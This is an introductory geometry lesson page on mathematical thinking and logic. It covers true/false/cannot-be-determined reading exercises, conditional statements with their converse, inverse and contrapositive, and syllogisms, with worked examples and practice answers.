To illustrate the use of residual plots for regression diagnostics, let's consider the three plots in Figure 15.6. In Figure 15.6(a), the residuals are scattered about the x-axis (residuals = 0) and fall roughly in a horizontal band, so Assumptions 1 and 2 appear to be met.
In Figure 15.6(b), the relation between the variables appears curved, indicating that Assumption 1 may be violated. In Figure 15.6(c), the conditional standard deviations appear to increase as x increases, indicating that Assumption 2 may be violated.

Inferences for the Slope of the Population Regression Line

Suppose that the variables x and y satisfy the assumptions for regression inferences. Then, for each value x of the predictor variable, the conditional distribution of the response variable is a normal distribution with mean 𝛽0 + 𝛽1x and standard deviation 𝜎. Of particular interest is whether the slope, 𝛽1, of the population regression line equals 0. If 𝛽1 = 0, then, for each value x of the predictor variable, the conditional distribution of the response variable is a normal distribution having mean 𝛽0 and standard deviation 𝜎. Because x does not appear in either of those two parameters, it is useless as a predictor of y.

Of note, although x alone may not be useful for predicting y, it may be useful in conjunction with another variable or variables. Thus, in this section, when we say that x is not useful for predicting y, we really mean that the regression equation with x as the only predictor variable is not useful for predicting y. Conversely, although x alone may be useful for predicting y, it may not be useful in conjunction with another variable or variables. Thus, in this section, when we say that x is useful for predicting y, we really mean that the regression equation with x as the only predictor variable is useful for predicting y.

We can decide whether x is useful as a (linear) predictor of y – that is, whether the regression equation has utility – by performing the hypothesis test H0: 𝛽1 = 0 (x is not useful for predicting y) versus Ha: 𝛽1 ≠ 0 (x is useful for predicting y). We base hypothesis tests for 𝛽1 on the statistic b1.
From the assumptions for regression inferences, we can show that the sampling distribution of the slope of the regression line is a normal distribution whose mean is the slope, 𝛽1, of the population regression line, and whose standard deviation is 𝜎/√Sxx (Key Fact 15.3).

As a consequence of Key Fact 15.3, the standardized variable z = (b1 − 𝛽1)/(𝜎/√Sxx) has the standard normal distribution. But this variable cannot be used as a basis for the required test statistic because the common conditional standard deviation, 𝜎, is unknown. We therefore replace 𝜎 with its sample estimate se, the standard error of the estimate. As you might suspect, the resulting variable t = (b1 − 𝛽1)/(se/√Sxx) has a t-distribution with df = n − 2 (Key Fact 15.4).

In light of Key Fact 15.4, for a hypothesis test with the null hypothesis H0: 𝛽1 = 0, we can use the variable t as the test statistic and obtain the critical values or P-value from the t-table. We call this hypothesis-testing procedure the regression t-test.

Confidence Intervals for the Slope of the Population Regression Line

Obtaining an estimate for the slope of the population regression line is worthwhile. We know that a point estimate for 𝛽1 is provided by b1. To determine a confidence-interval estimate for 𝛽1, we apply Key Fact 15.4 to obtain Procedure 15.2, called the regression t-interval procedure, with endpoints b1 ± t𝛼/2 · se/√Sxx.

Estimating and Prediction

In this section, we examine how a sample regression equation can be used to make two important inferences: 1) estimate the conditional mean of the response variable corresponding to a particular value of the predictor variable; 2) predict the value of the response variable for a particular value of the predictor variable.

In light of Key Fact 15.5, if we standardize the variable ŷp, the resulting variable has the standard normal distribution. However, because the standardized variable contains the unknown parameter 𝜎, it cannot be used as a basis for a confidence-interval formula.
Therefore, we replace 𝜎 by its estimate se, the standard error of the estimate. The resulting variable has a t-distribution (Key Fact 15.6). Recalling that 𝛽0 + 𝛽1xp is the conditional mean of the response variable corresponding to the value xp of the predictor variable, we can apply Key Fact 15.6 to derive a confidence-interval procedure for means in regression. We call that procedure the conditional mean t-interval procedure.

Prediction Intervals

A primary use of a sample regression equation is to make predictions. Prediction intervals are similar to confidence intervals. The term confidence is usually reserved for interval estimates of parameters; the term prediction is used for interval estimates of variables.

In light of Key Fact 15.7, if we standardize the variable yp − ŷp, the resulting variable has the standard normal distribution. However, because the standardized variable contains the unknown parameter 𝜎, it cannot be used as a basis for a prediction-interval formula. So we replace 𝜎 by its estimate se, the standard error of the estimate. The resulting variable has a t-distribution (Key Fact 15.8).

Using Key Fact 15.8, we can derive a prediction-interval procedure, called the predicted value t-interval procedure.

Inferences in Correlation

Frequently, we want to decide whether two variables are linearly correlated, that is, whether there is a linear relationship between two variables. In the context of regression, we can make that decision by performing a hypothesis test for the slope of the population regression line. Alternatively, we can perform a hypothesis test for the population linear correlation coefficient, 𝜌. This parameter measures the linear correlation of all possible pairs of observations of two variables in the same way that a sample linear correlation coefficient, r, measures the linear correlation of a sample of pairs.
Thus, 𝜌 actually describes the strength of the linear relationship between two variables; r is only an estimate of 𝜌 obtained from sample data.

The population linear correlation coefficient of two variables x and y always lies between −1 and 1. Values of 𝜌 near −1 or 1 indicate a strong linear relationship between the variables, whereas values of 𝜌 near 0 indicate a weak linear relationship between the variables. As we mentioned, a sample linear correlation coefficient, r, is an estimate of the population linear correlation coefficient, 𝜌. Consequently, we can use r as a basis for performing a hypothesis test for 𝜌.

In light of Key Fact 15.9, for a hypothesis test with the null hypothesis H0: 𝜌 = 0, we use the test statistic t = r√((n − 2)/(1 − r²)), which has a t-distribution with df = n − 2, and obtain the critical values or P-value from the t-table. We call this hypothesis-testing procedure the correlation t-test.
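The slope estimate, standard error of the estimate, and regression t-statistic described above can all be computed with a few lines of code. A minimal sketch in pure Python (the sample data are made up for illustration; in practice the resulting t would be compared with a t-table value for df = n − 2):

```python
import math

def regression_t_statistic(xs, ys):
    """Return b0, b1, the standard error of the estimate se,
    and the t-statistic for H0: beta1 = 0 (df = n - 2)."""
    n = len(xs)
    xbar, ybar = sum(xs) / n, sum(ys) / n
    sxx = sum((x - xbar) ** 2 for x in xs)
    sxy = sum((x - xbar) * (y - ybar) for x, y in zip(xs, ys))
    b1 = sxy / sxx
    b0 = ybar - b1 * xbar
    sse = sum((y - (b0 + b1 * x)) ** 2 for x, y in zip(xs, ys))
    se = math.sqrt(sse / (n - 2))        # standard error of the estimate
    t = b1 / (se / math.sqrt(sxx))       # regression t-statistic
    return b0, b1, se, t

# Made-up, nearly linear data (roughly y = 2x)
xs = [1, 2, 3, 4, 5, 6]
ys = [2.1, 3.9, 6.2, 7.8, 10.1, 11.9]
b0, b1, se, t = regression_t_statistic(xs, ys)
```

Because the data lie very close to a line, the computed t is far out in the tail of the t-distribution, so H0: 𝛽1 = 0 would be rejected at any common significance level.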
[ null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/statistics-denial-statistics-debacles-Malfeasance.jpg", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-10-at-9.18.05-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-14-at-4.40.53-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-3.49.51-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-3.51.45-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-5.45.29-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-9.25.34-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-9.57.10-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-9.58.02-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-10.15.26-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-11.06.18-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-11.07.53-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-11.15.15-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-15-at-11.24.57-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-8.06.33-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-8.30.41-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-8.46.44-PM.png", null, 
"http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-9.31.56-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-9.45.37-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-9.47.24-PM.png", null, "http://www.tomhsiung.com/wordpress/wp-content/uploads/2017/10/Screen-Shot-2017-10-16-at-10.18.09-PM.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8928168,"math_prob":0.9923708,"size":19784,"snap":"2020-10-2020-16","text_gpt3_token_len":4139,"char_repetition_ratio":0.2019717,"word_repetition_ratio":0.16422018,"special_character_ratio":0.19935301,"punctuation_ratio":0.10065466,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99940646,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42],"im_url_duplicate_count":[null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null,7,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-02-25T03:53:00Z\",\"WARC-Record-ID\":\"<urn:uuid:b9650fc3-86a0-4499-89f1-0102711f8b82>\",\"Content-Length\":\"111687\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:5190f8e2-4f82-4773-a6c2-65b9bae01056>\",\"WARC-Concurrent-To\":\"<urn:uuid:5a96c69f-1fc8-44eb-b129-fbd6e1f50e6d>\",\"WARC-IP-Address\":\"100.42.56.12\",\"WARC-Target-URI\":\"http://www.tomhsiung.com/wordpress/tag/regression-equation/\",\"WARC-Payload-Digest\":\"sha1:23SUI7ZSMCTMJZ7MLMKE4RIRRKEL7FWH\",\"WARC-Block-Digest\":\"sha1:VGASWKA4JGEZGLSPSAFIWEUL3XIUVK2O\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-10/CC-MAIN-2020-10_segments_1581875146004.9_warc_CC-MAIN-20200225014941-20200225044941-00308.warc.gz\"}"}
https://www.brighthubengineering.com/cad-autocad-reviews-tips/19291-applications-of-the-cad-software-what-is-geometric-modeling/
[ "Applications of the CAD Software – What is Geometric Modeling?\n\nWhat is Geometric Modeling?\n\nThere are number of applications of the CAD software, one of the most popular applications being geometric modeling. First of all let us see what is geometric modeling? The computer compatible mathematical description of the geometry of the object is called as geometric modeling. The CAD software allows the mathematical description of the object to be displayed as the image on the monitor of the computer.\n\nSteps for Creating the Geometric Model\n\nThere are three steps in which the designer can create geometric models by using CAD software, these are:\n\n1) Creation of basic geometric objects: In the first step the designer creates basic geometric elements by using commands like points, lines, and circles.\n\n2) Transformations of the elements: In the second step the designer uses commands like achieve scaling, rotation and other related transformations of the geometric elements.\n\n3) Creation of the geometric model: During the final step the designer uses various commands to that cause integration of the objects or elements of the geometric model to form the desired shape.\n\nDuring the process of geometric modeling the computer converts various commands given from within the CAD software into mathematical models, stores them as the files and finally displays them as the image. The geometric models created by the designer can open at any time for reviewing, editing or analysis.\n\nRepresentation of the Geometric Models\n\nOf the various forms of representing the objects in geometric models, the most basic is wire frames. In this form the object is displayed by interconnected lines as shown in the figure below (source: Wikipedia). There are three types of wire frame geometric modeling, these are: 2D, 2.1/2D and 3D. 
They are described below:

1) 2D: It stands for two-dimensional view and is useful for flat objects.

2) 2.1/2D: It gives views beyond the 2D view and permits viewing of a 3D object that has no sidewall details.

3) 3D: The three-dimensional representation allows complete three-dimensional viewing of the model with highly complex geometry. Solid modeling is the most advanced method of geometric modeling in three dimensions.

Reference

Book: CAD/CAM: Computer Aided Design and Manufacturing by Mikell P. Groover and Emory W. Zimmers

This post is part of the series: Applications of CAD

This is a series of articles describing various applications of CAD software like geometric modeling, engineering analysis, FEA, design review and evaluation, drafting, etc.
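The three modeling steps described above (create basic elements, transform them, integrate them into a model) can be illustrated with a small script. This is a hedged sketch using plain 2D points and the standard rotation and scaling formulas, not the API of any particular CAD package:

```python
import math

# Step 1: create basic geometric elements (here, the vertices of a unit square)
square = [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0), (0.0, 1.0)]

def scale(points, sx, sy):
    """Step 2a: scaling transformation about the origin."""
    return [(sx * x, sy * y) for x, y in points]

def rotate(points, theta):
    """Step 2b: rotation about the origin by angle theta (radians)."""
    c, s = math.cos(theta), math.sin(theta)
    return [(c * x - s * y, s * x + c * y) for x, y in points]

# Step 3: integrate the transformed elements into the desired model --
# here, a 2x1 rectangle rotated 90 degrees
model = rotate(scale(square, 2.0, 1.0), math.pi / 2)
```

A real CAD system stores such transformed elements as mathematical models in files and renders them on screen, but the underlying create/transform/integrate pipeline is the same.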
[ null, "https://img.bhs4.com/CA/6/CA63CD9E220E488788EA94AEE6FA83704586D596_large.jpg", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89341444,"math_prob":0.96995556,"size":2682,"snap":"2019-43-2019-47","text_gpt3_token_len":535,"char_repetition_ratio":0.18595967,"word_repetition_ratio":0.009433962,"special_character_ratio":0.19276659,"punctuation_ratio":0.106694564,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9635453,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-10-21T03:03:18Z\",\"WARC-Record-ID\":\"<urn:uuid:e27bd727-eae0-436d-b996-2458287cc121>\",\"Content-Length\":\"112273\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e745d345-4cfc-405c-9a85-08be34c815b2>\",\"WARC-Concurrent-To\":\"<urn:uuid:99b29a94-a733-45c0-9b47-090550e0c72b>\",\"WARC-IP-Address\":\"104.28.6.60\",\"WARC-Target-URI\":\"https://www.brighthubengineering.com/cad-autocad-reviews-tips/19291-applications-of-the-cad-software-what-is-geometric-modeling/\",\"WARC-Payload-Digest\":\"sha1:PR2W6NAGL2AIPHTZJR4KY27SLHSIJ3W6\",\"WARC-Block-Digest\":\"sha1:GAYFY3Q64EEFMXKT6E7UH6Z734P4MWXY\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-43/CC-MAIN-2019-43_segments_1570987751039.81_warc_CC-MAIN-20191021020335-20191021043835-00063.warc.gz\"}"}
https://ricerca.sns.it/handle/11384/125502
[ "We shall consider sections of a complex elliptic scheme E over an affine base curve B, and study the points of B where the section takes a torsion value. In particular, we shall relate the distribution in B of these points with the canonical height of the section, proving an integral formula involving a measure on B coming from the so-called Betti map of the section. We shall show that this measure is the same one which appears in dynamical issues related to the section. This analysis will also involve the multiplicity with which a torsion value is attained, which is an independent problem. We shall prove finiteness theorems for the points where the multiplicity is higher than expected. Such multiplicity has also a relation with Diophantine Approximation and quasi-integral points on E (over the affine ring of B), and in Sections 5 and 6 of the paper we shall exploit this viewpoint, proving an effective result in the spirit of Siegel’s theorem on integral points.\n\n### On the torsion values for sections of an elliptic scheme\n\n#### Abstract\n\nWe shall consider sections of a complex elliptic scheme E over an affine base curve B, and study the points of B where the section takes a torsion value. In particular, we shall relate the distribution in B of these points with the canonical height of the section, proving an integral formula involving a measure on B coming from the so-called Betti map of the section. We shall show that this measure is the same one which appears in dynamical issues related to the section. This analysis will also involve the multiplicity with which a torsion value is attained, which is an independent problem. We shall prove finiteness theorems for the points where the multiplicity is higher than expected. 
Such multiplicity has also a relation with Diophantine Approximation and quasi-integral points on E (over the affine ring of B), and in Sections 5 and 6 of the paper we shall exploit this viewpoint, proving an effective result in the spirit of Siegel’s theorem on integral points.\n##### Scheda breve Scheda completa Scheda completa (DC)\n2021\nSettore MAT/03 - Geometria\nFile in questo prodotto:\nFile\n1909.01253.pdf\n\nAccesso chiuso\n\nTipologia: Accepted version (post-print)\nLicenza: Non pubblico\nDimensione 361.06 kB\n10.1515_crelle-2021-0056.pdf\n\nOpen Access dal 29/10/2022\n\nTipologia: Published version\nLicenza: Solo Lettura\nDimensione 534.61 kB\nUtilizza questo identificativo per citare o creare un link a questo documento: `https://hdl.handle.net/11384/125502`\n•", null, "ND\n•", null, "5\n•", null, "4" ]
[ null, "https://ricerca.sns.it/sr/cineca/images/thirdparty/pmc_small.png", null, "https://ricerca.sns.it/sr/cineca/images/thirdparty/scopus_small.png", null, "https://ricerca.sns.it/sr/cineca/images/thirdparty/isi_small.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8574664,"math_prob":0.9473476,"size":2520,"snap":"2023-40-2023-50","text_gpt3_token_len":590,"char_repetition_ratio":0.12321144,"word_repetition_ratio":0.7911548,"special_character_ratio":0.21230158,"punctuation_ratio":0.08154506,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9669456,"pos_list":[0,1,2,3,4,5,6],"im_url_duplicate_count":[null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-05T05:57:56Z\",\"WARC-Record-ID\":\"<urn:uuid:7c0ba5a4-9ca0-4b35-8b29-a16e3a227d66>\",\"Content-Length\":\"50516\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:7298b260-32df-4dfd-9814-707e79a5081f>\",\"WARC-Concurrent-To\":\"<urn:uuid:ac424203-b93a-4426-9730-b5d6d295c65d>\",\"WARC-IP-Address\":\"130.186.29.4\",\"WARC-Target-URI\":\"https://ricerca.sns.it/handle/11384/125502\",\"WARC-Payload-Digest\":\"sha1:QB62H6WE4ETQS4COPLLBYDGIB6RJCQWT\",\"WARC-Block-Digest\":\"sha1:2UAYH4ECQFKAAMR7ZLAQGHGP4VTUCD2H\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100545.7_warc_CC-MAIN-20231205041842-20231205071842-00163.warc.gz\"}"}
https://sites.google.com/site/geometry4sage20112012/home/resources/star-lessons/lesson-1-mathematical-thinking
[ "SAGE Academy‎ > ‎Resources‎ > ‎STARS® Lessons‎ > ‎\n\n### Lesson 1: Mathematical Thinking and Logic\n\nLesson 1: Mathematical Thinking and Logic\n\nObjectives\n\nBy the end of this lesson, students will be able to:\n\n• decide whether information drawn from a passage is true, false, or cannot be determined\n• recognize the hypothesis and conclusion of a conditional statement\n• state conditionals in the if … then form\n• recognize and state the converse, inverse, and contrapositive of a statement\n• draw correct conclusions from given statements\n\nIntroduction\n\nGeometry is a word taken from the Greeks with \"geo\" meaning earth and \"metron\" meaning measure. In about 300 BC, a Greek mathematician by the name of Euclid wrote a book called The Elements. It was a collection of all the known geometric facts organized in a logical manner. He included basic terms, like point, line, and plane, along with accepted principles called axioms or postulates. Euclid is known as the \"Father of Geometry.\"", null, "In this lesson, you will apply critical thinking and decide whether information drawn from a passage is true, false, or cannot be determined. You will then learn how to recognize the hypothesis and conclusion of a conditional statement and how to state conditionals in the if… then form. Finally, you will learn to recognize and/or state the converse, inverse, and contrapositive of a statement, as well as draw correct conclusions from given statements.\n\nCritical Thinking\n\nThe study of geometry requires one to be a critical thinker. Approaching and solving geometry problems is like a good detective analyzing a crime scene and looking for clues. 
You must be able to put your information in a clear, logical sequence to show how you arrived at your conclusion.

Example 1

Read the sentence below and determine if the statements that follow are true, false, or cannot be determined.

The Wilsons boarded a train to evacuate New Orleans two days prior to Hurricane Gustav coming ashore on Monday, September 1, 2008.

| Statement | Explanation |
| --- | --- |
| Gustav was a hurricane. | True. The hurricane is named in the sentence. |
| The Wilsons boarded the train on Friday. | False. Two days before it came ashore would be Saturday, not Friday. |
| The Wilsons' home is in New Orleans. | Cannot be determined. The Wilsons could have been visiting the city, so they do not necessarily live there. |
| The Wilsons have at least one child. | Cannot be determined. The sentence does not mention how many people are in the Wilson family. |
| The Wilsons left their car in New Orleans. | Cannot be determined. Nothing was mentioned about a car. |

As you can see from the example above, a valid conclusion cannot be drawn when you are missing a number of facts.

Example 2

Read the following passage and determine if the statements that follow are true, false, or cannot be determined.

The Wilsons arrived safely in Baltimore after boarding a train in New Orleans to escape Hurricane Gustav. Aunt Betty was waiting at the station two hours before they arrived. They hugged each other and headed for the parking garage. Soon after, they were in a car on the highway heading towards a good home-cooked meal.

| Statement | Explanation |
| --- | --- |
| The Wilsons left New Orleans to escape Hurricane Gustav. | True. It is stated in the sentence. |
| Aunt Betty lives in Baltimore. | Cannot be determined. Aunt Betty could have driven from another city to Baltimore to pick up the Wilsons. |
| The Wilsons arrived on time. | Cannot be determined. The passage does not mention if the train was on time or not. |
| The Wilsons boarded a train in Baltimore. | False. Aunt Betty picked them up in her car. |
| The train's final destination was Baltimore. | Cannot be determined. The passage does not mention if the train was only making a stop in Baltimore. |

Practice

Read the passage below and determine if the statements that follow are true, false, or cannot be determined.

The second before she opened her mouth, all Thomas could think was, "If I hear another horrible actor, I'm going to walk out that door." She wasn't, thankfully, but it didn't really matter, because he never would've walked out that door, the door in question being the one in the tiny rehearsal room at Harlequin Studios. It was a grungy-looking rehearsal studio, where everything smelled a little funny, like some undiscovered form of mildew. He wouldn't have walked out that door because auditions weren't over yet, and he was a professional, even though he wouldn't be getting paid. Neither would the actors--the more than 160 of them. The woman who was talking was actually pretty good, good enough to get called back. Her name, Skye Benrexi, was interesting enough alone to merit a callback.

Used with permission from David L. Williams

1. The rehearsal studio is located in New York City.

Cannot be determined

2. There were more than 160 actors that came to the audition.

True

3. Thomas was auditioning for a part.

False

4. Each actor selected would receive a paycheck.

False

5. Skye Benrexi will be selected for the part.

Cannot be determined

6. The rehearsal room is located at Harlequin Studios.

True

7. The rehearsal room was clean and fresh.

False

8. Skye auditioned well.

True

9. Thomas was a professional.

True

10.
Skye Benrexi is a stage name.

Cannot be determined

Conditional Statements

Look at the following conditional statement:

If the Sun shines, then you will see your shadow.

The first clause begins with the word if - "if the Sun shines." This part of the statement is called the hypothesis. The second clause begins with the word then - "then you will see your shadow." This part of the statement is called the conclusion. The if statement is the given information, and the then statement is the conclusion or result of the given information. Conditional statements are used to establish certain conclusions.

In mathematics, we can label the if statement with the letter p and the then statement with a q. We can show the conditional statement using symbols in a few different ways:

if p, then q

p implies q

p → q

Example 3

Identify the hypothesis and conclusion in the following statement:

If I score a 93% on the test, then I will have an A average.

hypothesis: I score a 93% on the test

conclusion: I will have an A average

Example 4

Identify the hypothesis and conclusion in the following statement:

If the cows are lying down in the field, then it will rain.

hypothesis: the cows are lying down in the field

conclusion: it will rain

Example 5

Identify the hypothesis and conclusion in the following statement:

If x and y are integers, then their product will be an integer.

hypothesis: x and y are integers

conclusion: their product will be an integer

Conditional statements are not always written in the if… then form.

Example 6

Identify the hypothesis and conclusion in the statement below. Rewrite the statement so it is in the form if… then.

When it rains, it pours.

hypothesis: it rains

conclusion: it pours

if… then form: If it rains, then it pours.

Example 7

Identify the hypothesis and conclusion in the statement below.
Rewrite the statement so it is in the form if… then.

A banana is soft if it is spoiled.

hypothesis: a banana is spoiled

conclusion: it is soft

if… then form: If a banana is spoiled, then it is soft.

Practice

1-5. Identify the hypothesis and conclusion in the statements below. If a statement is not in the form if… then, rewrite the statement so it is in the form if… then.

1. If the lights are on in the house, then someone is home.

hypothesis: the lights are on in the house

conclusion: someone is home

2. You should come inside if you get cold.

if… then form: If you get cold, then you should come inside.

hypothesis: you get cold

conclusion: you should come inside

3. If a triangle has two equal sides, then it is an isosceles triangle.

hypothesis: a triangle has two equal sides

conclusion: it is an isosceles triangle

4. The early bird gets the worm.

if… then form: If the bird is early, then it gets the worm.

hypothesis: the bird is early

conclusion: it gets the worm

5. A straight angle measures 180 degrees.

if… then form: If an angle is a straight angle, then it measures 180 degrees.

hypothesis: an angle is a straight angle

conclusion: it has a measure of 180 degrees

Equivalent Statements

The statement "A right angle has a measure of 90 degrees" can be written as a conditional statement:

If an angle is a right angle, then it has a measure of 90 degrees.

It is now in the form of "if p then q." If the p and q are reversed, the statement becomes:

If an angle has a measure of 90 degrees, then it is a right angle.

When the p and q are reversed, the converse is formed. The converse of p → q is written q → p. In this example, both the conditional statement and its converse are true. This is called a biconditional statement.
A statement is biconditional if both it and its converse are true. This is not always the case. Look at another conditional statement:

If you live in Miami, then you live in Florida.

Reversing the two parts of the statement gives us the converse:

If you live in Florida, then you live in Miami.

In this case the converse is not necessarily true. A person can live in other cities besides Miami and still be in Florida.

If we want to negate or say the negative of a statement, we use the word not. Once again, look at the conditional statement "If an angle is a right angle, then it measures 90 degrees." To make the negative of this statement, add not to each side:

If an angle is not a right angle, then it does not measure 90 degrees.

We use the symbol ~ for the word not. In this case, we can use symbols to describe this statement as ~p → ~q.

When you negate both the hypothesis and the conclusion, you have written the inverse. In the example above, both the conditional and its inverse are true, but this is not always the case. Look at the statement about Florida again:

If you live in Miami, then you live in Florida.

The inverse of this statement is not necessarily true:

If you do not live in Miami, then you do not live in Florida.

We can also take the inverse of the converse of a statement.

Conditional statement: If an angle is a right angle, then it measures 90 degrees.

Converse: If an angle measures 90 degrees, then it is a right angle.

Take the inverse of the converse: If an angle does not measure 90 degrees, then it is not a right angle.

The inverse of a converse is called the contrapositive. For example, the contrapositive of the statement "If you live in Miami, then you live in Florida" is the following:

If you do not live in Florida, then you do not live in Miami.

In both cases above, note that the contrapositive is true.
The contrapositive is always logically equivalent to the conditional statement (in other words, they both have the same meaning).

Example 8

Accept the following conditional statement as true:

If you live in Winchester, then you attend St. Augustus High School.

Write the converse, inverse, and contrapositive of the statement. Say whether each is true, false, or not necessarily true (cannot be determined), and which if any are logically equivalent.

| | Statement | Explanation |
| --- | --- | --- |
| Converse | If you attend St. Augustus High School, then you live in Winchester. | Not necessarily true. The statement does not indicate whether all students at St. Augustus High School live in Winchester. |
| Inverse | If you do not live in Winchester, then you do not attend St. Augustus High School. | Not necessarily true. Someone who does not live in Winchester might still attend St. Augustus High School. |
| Contrapositive | If you do not attend St. Augustus High School, then you do not live in Winchester. | True. The contrapositive is logically equivalent to the conditional: if you live in Winchester, then you attend St. Augustus High School, so if you do not attend St. Augustus High School, then you do not live in Winchester. |

Practice

1. Accept the following conditional statement as true:

If you are on Flight #107, then you are going to Atlanta.

Write the converse, inverse, and contrapositive of the statement, and say which statements, if any, are logically equivalent.

Converse: If you are going to Atlanta, then you are on Flight #107. (not necessarily true)

Inverse: If you are not on Flight #107, then you are not going to Atlanta. (not necessarily true)

Contrapositive: If you are not going to Atlanta, then you are not on Flight #107.
(true)

The conditional and the contrapositive are logically equivalent. The converse and inverse are also logically equivalent.

2. Identify the relation of each of the following statements to the original statement below:

If you use a boogie board, then you live along the coast.

a) If you do not live along the coast, then you do not use a boogie board.

b) If you live along the coast, then you use a boogie board.

c) If you do not use a boogie board, then you do not live along the coast.

a) contrapositive

b) converse

c) inverse

Deductive Reasoning

In presenting a logical argument, one must combine at least three conditional statements in the following form (the symbol for "therefore" is ∴).

p → q

q → r

∴ p → r

Above, if the first two statements (premises) are true, then the third statement (conclusion) must also be true. Notice the hypothesis of one premise is the same as the conclusion of the other premise. This is called a syllogism. If the first and second premises are true, then the final conclusion is also true.

Example 9

If a student walks to school, he is late for school. If a student is late for school, he misses part of his first class. What conclusion can you reach based on these premises?

p → q: If a student walks to school (p), he is late for school (q).

q → r: If a student is late for school (q), he misses part of his first class (r).

∴ p → r: Therefore, a student who walks to school misses part of his first class.

Example 10

If you live in Tampa, then you live in Hillsborough County. If you live in Hillsborough County, then you live in Florida. What conclusion can you reach based on these premises?

p → q: If you live in Tampa (p), then you live in Hillsborough County (q).

q → r: If you live in Hillsborough County (q), then you live in Florida (r).

∴ p → r: Therefore, if you live in Tampa, you live in Florida.

Practice

1.
Louis lives in the Ninth Ward. The Ninth Ward is in New Orleans. What conclusion can be reached from these premises?

Therefore, Louis lives in New Orleans.

2. Determine if the following pairs of premises form a syllogism. If they do, state the conclusion.

p → q

p → r

No. (The hypothesis of one is not the conclusion of the other.)

3. Determine if the following pairs of premises form a syllogism. If they do, state the conclusion.

q → r

p → q

Yes, p → r. (The order of the premises can be changed, so p → q, q → r, ∴ p → r.)

Multiple Premises

Sometimes there are more than two premises to consider.

p → q

q → r

r → s

s → t

∴ p → t

This is what a good detective does when solving a crime. One clue will lead to another. Eventually, when all the pieces fit together in the proper order, the crime is solved. Look at the premises below that lead to a conclusion. Notice the conclusion of one statement is the hypothesis of the next statement.

If Alvin has $80, then he will go shopping.

If Alvin goes shopping, then he will buy baseball shoes.

If Alvin buys baseball shoes, then he will try out for the team.

If Alvin tries out for the team, then he will make the team.

Therefore, if Alvin has $80, then he will make the baseball team.

Sometimes the steps to prove a syllogism are not as obvious as those in the preceding problems. An equivalent statement may need to be written in order to have the conclusion of one premise be the hypothesis of the other. Equivalent statements can be substituted for one another. Recall that the conditional and its contrapositive are equivalent.
Look at the examples below of equivalent statements:

p → q is equivalent to ~q → ~p

~p → q is equivalent to ~q → p

q → ~p is equivalent to p → ~q

Each of these could be substituted to produce a syllogism that leads to a conclusion.

Example 11

Determine if the following pairs of premises form a syllogism. If they do, state the conclusion.

c → ~d

e → d

Use the fact that the contrapositive of c → ~d is d → ~c.

Rewrite the pair of premises, changing the order and substituting the contrapositive, to find the conclusion.

e → d

d → ~c

∴ e → ~c

Practice

